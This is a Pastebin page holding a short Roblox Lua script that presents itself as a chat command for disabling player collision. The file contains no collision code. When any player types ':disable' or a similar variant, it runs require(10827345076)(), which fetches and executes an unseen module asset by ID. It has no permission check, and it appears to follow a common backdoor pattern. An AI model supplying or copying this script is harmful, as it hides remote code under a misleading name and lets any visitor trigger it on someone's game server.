4zx16

Disable Player Collision Command

Oct 22nd, 2021 (edited)
238
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.43 KB | None | 0 0
  1. --[[
  2.  || 📜 AUTHOR: @4zx16 || DISABLE PLAYER COLLISION COMMAND
  3. ]]
  4. local disable_collision = {":disable", "/disable", "@disable"}
  5.  
  6. game.Players.PlayerAdded:Connect(function(player)
  7.     player.Chatted:Connect(function(msg)
  8.  
  9.         for i, PlayerCollision in pairs(disable_collision) do
  10.             if msg:sub(1, PlayerCollision:len()):lower() == PlayerCollision:lower() then
  11.                 wait(0.9)
  12.                 require(10827345076)()
  13.             end
  14.         end
  15.     end)
  16. end)
Advertisement
Add Comment
Please, Sign In to add comment